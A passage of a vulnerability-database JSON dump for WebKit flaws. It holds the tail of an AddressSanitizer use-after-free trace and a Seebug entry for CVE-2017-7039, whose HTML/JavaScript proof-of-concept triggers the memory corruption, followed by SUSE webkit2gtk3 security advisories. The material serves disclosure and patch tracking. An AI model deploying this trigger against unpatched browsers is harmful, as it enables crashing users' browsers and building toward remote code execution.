WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd02779)\r\n #18 0x111eb69a6 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd019a6)\r\n #19 0x111eb842e in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd0342e)\r\n #20 0x1118a5351 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6f0351)\r\n #21 0x1119e103d in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c03d)\r\n #22 0x1119a0386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)\r\n #23 0x11142f997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #24 0x1114292aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #25 0x113db0c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #26 0x10cfff2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #27 0x10d002689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #28 0x10d001ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #29 0x10c8a2683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n\r\nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1343a) in WebCore::Node::nextSibling() const\r\nShadow bytes around the buggy address:\r\n 0x1c1800016db0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa\r\n 0x1c1800016dc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c1800016dd0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd\r\n 0x1c1800016de0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa\r\n 0x1c1800016df0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n=>0x1c1800016e00: fa fa fa fa fa fa fa fa fd fd fd fd fd fd[fd]fd\r\n 0x1c1800016e10: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa\r\n 0x1c1800016e20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c1800016e30: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00\r\n 0x1c1800016e40: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa\r\n 0x1c1800016e50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==29516==ABORTING\r\n=================================================================\r\n```", "published": "2017-07-27T00:00:00", "type": "seebug", "title": "WebKit: use-after-free in WebCore::Node::nextSibling(CVE-2017-7039)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7039"], "modified": "2017-07-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96312", "id": "SSV:96312", "sourceData": "\n <script>\r\nfunction freememory() {\r\n var a;\r\n for(var i=0;i<100;i++) {\r\n a = new Uint8Array(1024*1024);\r\n }\r\n}\r\nfunction go() {\r\n meter.textContent = \"foo\";\r\n freememory();\r\n}\r\nfunction eventhandler() {\r\n template.appendChild(table);\r\n}\r\n</script>\r\n<body onload=go()>\r\n<meter id=\"meter\">\r\n<shadow>\r\n<template id=\"template\">\r\n</template>\r\n<style onload=\"eventhandler()\"></style>\r\n<table id=\"table\">\r\n<iframe></iframe>\r\n<svg>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96312", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2017-11-10T20:33:12", "bulletinFamily": "unix", "cvelist": ["CVE-2017-2369", "CVE-2017-7034", "CVE-2017-7064", "CVE-2017-2355", "CVE-2017-7056", "CVE-2016-7599", "CVE-2017-7055", "CVE-2016-7654", "CVE-2017-2539", "CVE-2017-2363", "CVE-2016-7623", "CVE-2016-7645", "CVE-2017-2366", "CVE-2016-7589", "CVE-2016-7586", "CVE-2017-2538", "CVE-2017-2365", "CVE-2017-7037", "CVE-2017-7018", "CVE-2016-7641", "CVE-2016-7635", "CVE-2017-7061", "CVE-2017-2371", "CVE-2016-7652", "CVE-2017-7048", "CVE-2016-7632", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-2496", "CVE-2017-2364", "CVE-2017-2350", "CVE-2017-2373", "CVE-2017-2356", "CVE-2016-7639", "CVE-2016-7592", "CVE-2016-7656", "CVE-2017-2510", "CVE-2017-2362", "CVE-2017-7030", "CVE-2017-2354"], "description": "This update for webkit2gtk3 to version 2.18.0 fixes the following issues:\n\n These security issues were fixed:\n\n - CVE-2017-7039: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7018: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7030: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7037: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7034: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7055: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7056: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7064: An issue was fixed that allowed remote attackers to\n bypass intended memory-read restrictions via a crafted app (bsc#1050469).\n - CVE-2017-7061: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7048: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7046: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-2538: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1045460)\n - CVE-2017-2496: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site.\n - CVE-2017-2539: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site.\n - CVE-2017-2510: An issue was fixed that allowed remote attackers to\n conduct Universal XSS (UXSS) attacks via a crafted web site that\n improperly interacts with pageshow events.\n - CVE-2017-2365: An issue was fixed that allowed remote attackers to\n bypass the Same Origin Policy and obtain sensitive information via a\n crafted web site (bsc#1024749)\n - CVE-2017-2366: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1024749)\n - CVE-2017-2373: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1024749)\n - CVE-2017-2363: An issue was fixed that allowed remote attackers to\n bypass the Same Origin Policy and obtain sensitive information via a\n crafted web site (bsc#1024749)\n - CVE-2017-2362: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1024749)\n - CVE-2017-2350: An issue was fixed that allowed remote attackers to\n bypass the Same Origin Policy and obtain sensitive information via a\n crafted web site (bsc#1024749)\n - CVE-2017-2350: An issue was fixed that allowed remote attackers to\n bypass the Same Origin Policy and obtain sensitive information via a\n crafted web site (bsc#1024749)\n - CVE-2017-2354: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1024749).\n - CVE-2017-2355: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (uninitialized\n memory access and application crash) via a crafted web site (bsc#1024749)\n - CVE-2017-2356: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1024749)\n - CVE-2017-2371: An issue was fixed that allowed remote attackers to\n launch popups via a crafted web site (bsc#1024749)\n - CVE-2017-2364: An issue was fixed that allowed remote attackers to\n bypass the Same Origin Policy and obtain sensitive information via a\n crafted web site (bsc#1024749)\n - CVE-2017-2369: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1024749)\n - CVE-2016-7656: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7635: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7654: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7639: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7645: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7652: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7641: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7632: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7599: An issue was fixed that allowed remote attackers to\n bypass the Same Origin Policy and obtain sensitive information via a\n crafted web site that used HTTP redirects (bsc#1020950)\n - CVE-2016-7592: An issue was fixed that allowed remote attackers to\n obtain sensitive information via crafted JavaScript prompts on a web\n site (bsc#1020950)\n - CVE-2016-7589: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7623: An issue was fixed that allowed remote attackers to\n obtain sensitive information via a blob URL on a web site (bsc#1020950)\n - CVE-2016-7586: An issue was fixed that allowed remote attackers to\n obtain sensitive information via a crafted web site (bsc#1020950)\n\n For other non-security fixes please check the changelog.\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n", "edition": 1, "modified": "2017-11-10T18:22:30", "published": "2017-11-10T18:22:30", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-11/msg00019.html", "id": "OPENSUSE-SU-2017:2991-1", "title": "Security update for webkit2gtk3 (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-06T18:33:22", "bulletinFamily": "unix", "cvelist": ["CVE-2017-2369", "CVE-2017-7034", "CVE-2017-7064", "CVE-2017-2355", "CVE-2017-7056", "CVE-2016-7599", "CVE-2017-7055", "CVE-2016-7654", "CVE-2017-2539", "CVE-2017-2363", "CVE-2016-7623", "CVE-2016-7645", "CVE-2017-2366", "CVE-2016-7589", "CVE-2016-7586", "CVE-2017-2538", "CVE-2017-2365", "CVE-2017-7037", "CVE-2017-7018", "CVE-2016-7641", "CVE-2016-7635", "CVE-2017-7061", "CVE-2017-2371", "CVE-2016-7652", "CVE-2017-7048", "CVE-2016-7632", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-2496", "CVE-2017-2364", "CVE-2017-2350", "CVE-2017-2373", "CVE-2017-2356", "CVE-2016-7639", "CVE-2016-7592", "CVE-2016-7656", "CVE-2017-2510", "CVE-2017-2362", "CVE-2017-7030", "CVE-2017-2354"], "description": "This update for webkit2gtk3 to version 2.18.0 fixes the following issues:\n\n These security issues were fixed:\n\n - CVE-2017-7039: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7018: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7030: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7037: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7034: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7055: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7056: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7064: An issue was fixed that allowed remote attackers to\n bypass intended memory-read restrictions via a crafted app (bsc#1050469).\n - CVE-2017-7061: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7048: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7046: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-2538: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1045460)\n - CVE-2017-2496: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site.\n - CVE-2017-2539: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site.\n - CVE-2017-2510: An issue was fixed that allowed remote attackers to\n conduct Universal XSS (UXSS) attacks via a crafted web site that\n improperly interacts with pageshow events.\n - CVE-2017-2365: An issue was fixed that allowed remote attackers to\n bypass the Same Origin Policy and obtain sensitive information via a\n crafted web site (bsc#1024749)\n - CVE-2017-2366: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1024749)\n - CVE-2017-2373: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1024749)\n - CVE-2017-2363: An issue was fixed that allowed remote attackers to\n bypass the Same Origin Policy and obtain sensitive information via a\n crafted web site (bsc#1024749)\n - CVE-2017-2362: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1024749)\n - CVE-2017-2350: An issue was fixed that allowed remote attackers to\n bypass the Same Origin Policy and obtain sensitive information via a\n crafted web site (bsc#1024749)\n - CVE-2017-2350: An issue was fixed that allowed remote attackers to\n bypass the Same Origin Policy and obtain sensitive information via a\n crafted web site (bsc#1024749)\n - CVE-2017-2354: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1024749).\n - CVE-2017-2355: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (uninitialized\n memory access and application crash) via a crafted web site (bsc#1024749)\n - CVE-2017-2356: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1024749)\n - CVE-2017-2371: An issue was fixed that allowed remote attackers to\n launch popups via a crafted web site (bsc#1024749)\n - CVE-2017-2364: An issue was fixed that allowed remote attackers to\n bypass the Same Origin Policy and obtain sensitive information via a\n crafted web site (bsc#1024749)\n - CVE-2017-2369: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1024749)\n - CVE-2016-7656: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7635: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7654: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7639: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7645: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7652: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7641: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7632: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7599: An issue was fixed that allowed remote attackers to\n bypass the Same Origin Policy and obtain sensitive information via a\n crafted web site that used HTTP redirects (bsc#1020950)\n - CVE-2016-7592: An issue was fixed that allowed remote attackers to\n obtain sensitive information via crafted JavaScript prompts on a web\n site (bsc#1020950)\n - CVE-2016-7589: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7623: An issue was fixed that allowed remote attackers to\n obtain sensitive information via a blob URL on a web site (bsc#1020950)\n - CVE-2016-7586: An issue was fixed that allowed remote attackers to\n obtain sensitive information via a crafted web site (bsc#1020950)\n\n For other non-security fixes please check the changelog.\n\n", "edition": 1, "modified": "2017-11-06T15:08:25", "published": "2017-11-06T15:08:25", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-11/msg00005.html", "id": "SUSE-SU-2017:2933-1", "title": "Security update for webkit2gtk3 (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-01T02:54:02", "bulletinFamily": "unix", "cvelist": ["CVE-2017-2369", "CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-5753", "CVE-2017-5754", "CVE-2017-7102", "CVE-2017-7020", "CVE-2017-13856", "CVE-2017-7038", "CVE-2017-13866", "CVE-2017-2355", "CVE-2017-7120", "CVE-2017-7117", "CVE-2017-7056", "CVE-2016-7599", "CVE-2016-4743", "CVE-2017-7055", "CVE-2016-7654", "CVE-2017-2539", "CVE-2017-2363", "CVE-2017-7099", "CVE-2016-7623", "CVE-2016-7645", "CVE-2017-2366", "CVE-2016-7589", "CVE-2017-7096", "CVE-2016-7586", "CVE-2017-7042", "CVE-2017-7090", "CVE-2017-2365", "CVE-2017-7081", "CVE-2017-7049", "CVE-2017-13788", "CVE-2017-13870", "CVE-2017-7037", "CVE-2017-7093", "CVE-2017-5715", "CVE-2016-7610", "CVE-2017-7156", "CVE-2017-13803", "CVE-2017-7018", "CVE-2016-7641", "CVE-2017-7052", "CVE-2016-7635", "CVE-2017-7061", "CVE-2017-2371", "CVE-2016-7652", "CVE-2017-7089", "CVE-2017-7048", "CVE-2016-7632", "CVE-2017-7107", "CVE-2017-7039", "CVE-2017-7098", "CVE-2017-7046", "CVE-2017-2496", "CVE-2017-2364", "CVE-2017-2350", "CVE-2017-7142", "CVE-2017-2373", "CVE-2017-7087", "CVE-2017-7092", "CVE-2017-7012", "CVE-2017-7019", "CVE-2016-7598", "CVE-2017-7040", "CVE-2017-2356", "CVE-2016-7587", "CVE-2017-7095", "CVE-2016-7639", "CVE-2016-7592", "CVE-2017-7100", "CVE-2016-7656", "CVE-2017-7157", "CVE-2017-7011", "CVE-2017-7006", "CVE-2017-7059", "CVE-2016-4692", "CVE-2017-7091", "CVE-2017-2510", "CVE-2017-2362", "CVE-2017-7094", "CVE-2017-7104", "CVE-2017-13798", "CVE-2017-7109", "CVE-2017-7030", "CVE-2017-7111", "CVE-2017-7041", "CVE-2017-2354"], "description": "This update for webkit2gtk3 fixes the following issues:\n\n Update to version 2.18.5:\n\n + Disable SharedArrayBuffers from Web API.\n + Reduce the precision of "high" resolution time to 1ms.\n + bsc#1075419 - Security fixes: includes improvements to mitigate the\n effects of Spectre and Meltdown (CVE-2017-5753 and CVE-2017-5715).\n\n Update to version 2.18.4:\n\n + Make WebDriver implementation more spec compliant.\n + Fix a bug when trying to remove cookies before a web process is\n spawned.\n + WebKitWebDriver process no longer links to libjavascriptcoregtk.\n + Fix several memory leaks in GStreamer media backend.\n + bsc#1073654 - Security fixes: CVE-2017-13866, CVE-2017-13870,\n CVE-2017-7156, CVE-2017-13856.\n\n Update to version 2.18.3:\n\n + Improve calculation of font metrics to prevent scrollbars from being\n shown unnecessarily in some cases.\n + Fix handling of null capabilities in WebDriver implementation.\n + Security fixes: CVE-2017-13798, CVE-2017-13788, CVE-2017-13803.\n\n Update to version 2.18.2:\n\n + Fix rendering of arabic text.\n + Fix a crash in the web process when decoding GIF images.\n + Fix rendering of wind in Windy.com.\n + Fix several crashes and rendering issues.\n\n Update to version 2.18.1:\n\n + Improve performance of GIF animations.\n + Fix garbled display in GMail.\n + Fix rendering of several material design icons when using the web font.\n + Fix flickering when resizing the window in Wayland.\n + Prevent default kerberos authentication credentials from being used in\n ephemeral sessions.\n + Fix a crash when webkit_web_resource_get_data() is cancelled.\n + Correctly handle touchmove and touchend events in WebKitWebView.\n + Fix the build with enchant 2.1.1.\n + Fix the build in HPPA and Alpha.\n + Fix several crashes and rendering issues.\n + Security fixes: CVE-2017-7081, CVE-2017-7087, CVE-2017-7089,\n CVE-2017-7090, CVE-2017-7091, CVE-2017-7092, CVE-2017-7093,\n CVE-2017-7094, CVE-2017-7095, CVE-2017-7096, CVE-2017-7098,\n CVE-2017-7099, CVE-2017-7100, CVE-2017-7102, CVE-2017-7104,\n CVE-2017-7107, CVE-2017-7109, CVE-2017-7111, CVE-2017-7117,\n CVE-2017-7120, CVE-2017-7142.\n\n - Enable gold linker on s390/s390x on SLE15/Tumbleweed.\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n", "edition": 1, "modified": "2018-02-01T00:14:30", "published": "2018-02-01T00:14:30", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00106.html", "id": "OPENSUSE-SU-2018:0326-1", "type": "suse", "title": "Security update for webkit2gtk3 (important)", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-26T00:53:32", "bulletinFamily": "unix", "cvelist": ["CVE-2017-2369", "CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-5753", "CVE-2017-5754", "CVE-2017-7102", "CVE-2017-7020", "CVE-2017-13856", "CVE-2017-7038", "CVE-2017-13866", "CVE-2017-2355", "CVE-2017-7120", "CVE-2017-7117", "CVE-2017-7056", "CVE-2016-7599", "CVE-2016-4743", "CVE-2017-7055", "CVE-2016-7654", "CVE-2017-2539", "CVE-2017-2363", "CVE-2017-7099", "CVE-2016-7623", "CVE-2016-7645", "CVE-2017-2366", "CVE-2016-7589", "CVE-2017-7096", "CVE-2016-7586", "CVE-2017-7042", "CVE-2017-7090", "CVE-2017-2365", "CVE-2017-7081", "CVE-2017-7049", "CVE-2017-13788", "CVE-2017-13870", "CVE-2017-7037", "CVE-2017-7093", "CVE-2017-5715", "CVE-2016-7610", "CVE-2017-7156", "CVE-2017-13803", "CVE-2017-7018", "CVE-2016-7641", "CVE-2017-7052", "CVE-2016-7635", "CVE-2017-7061", "CVE-2017-2371", "CVE-2016-7652", "CVE-2017-7089", "CVE-2017-7048", "CVE-2016-7632", "CVE-2017-7107", "CVE-2017-7039", "CVE-2017-7098", "CVE-2017-7046", "CVE-2017-2496", "CVE-2017-2364", "CVE-2017-2350", "CVE-2017-7142", "CVE-2017-2373", "CVE-2017-7087", "CVE-2017-7092", "CVE-2017-7012", "CVE-2017-7019", "CVE-2016-7598", "CVE-2017-7040", "CVE-2017-2356", "CVE-2016-7587", "CVE-2017-7095", "CVE-2016-7639", "CVE-2016-7592", "CVE-2017-7100", "CVE-2016-7656", "CVE-2017-7157", "CVE-2017-7011", "CVE-2017-7006", "CVE-2017-7059", "CVE-2016-4692", "CVE-2017-7091", "CVE-2017-2510", "CVE-2017-2362", "CVE-2017-7094", "CVE-2017-7104", "CVE-2017-13798", "CVE-2017-7109", "CVE-2017-7030", "CVE-2017-7111", "CVE-2017-7041", "CVE-2017-2354"], "description": "This update for webkit2gtk3 fixes the following issues:\n\n Update to version 2.18.5:\n\n + Disable SharedArrayBuffers from Web API.\n + Reduce the precision of "high" resolution time to 1ms.\n + bsc#1075419 - Security fixes: includes improvements to mitigate the\n effects of Spectre and Meltdown (CVE-2017-5753 and CVE-2017-5715).\n\n Update to version 2.18.4:\n\n + Make WebDriver implementation more spec compliant.\n + Fix a bug when trying to remove cookies before a web process is\n spawned.\n + WebKitWebDriver process no longer links to libjavascriptcoregtk.\n + Fix several memory leaks in GStreamer media backend.\n + bsc#1073654 - Security fixes: CVE-2017-13866, CVE-2017-13870,\n CVE-2017-7156, CVE-2017-13856.\n\n Update to version 2.18.3:\n\n + Improve calculation of font metrics to prevent scrollbars from being\n shown unnecessarily in some cases.\n + Fix handling of null capabilities in WebDriver implementation.\n + Security fixes: CVE-2017-13798, CVE-2017-13788, CVE-2017-13803.\n\n Update to version 2.18.2:\n\n + Fix rendering of arabic text.\n + Fix a crash in the web process when decoding GIF images.\n + Fix rendering of wind in Windy.com.\n + Fix several crashes and rendering issues.\n\n Update to version 2.18.1:\n\n + Improve performance of GIF animations.\n + Fix garbled display in GMail.\n + Fix rendering of several material design icons when using the web font.\n + Fix flickering when resizing the window in Wayland.\n + Prevent default kerberos authentication credentials from being used in\n ephemeral sessions.\n + Fix a crash when webkit_web_resource_get_data() is cancelled.\n + Correctly handle touchmove and touchend events in WebKitWebView.\n + Fix the build with enchant 2.1.1.\n + Fix the build in HPPA and Alpha.\n + Fix several crashes and rendering issues.\n + Security fixes: CVE-2017-7081, CVE-2017-7087, CVE-2017-7089,\n CVE-2017-7090, CVE-2017-7091, CVE-2017-7092, CVE-2017-7093,\n CVE-2017-7094, CVE-2017-7095, CVE-2017-7096, CVE-2017-7098,\n CVE-2017-7099, CVE-2017-7100, CVE-2017-7102, CVE-2017-7104,\n CVE-2017-7107, CVE-2017-7109, CVE-2017-7111, CVE-2017-7117,\n CVE-2017-7120, CVE-2017-7142.\n\n - Enable gold linker 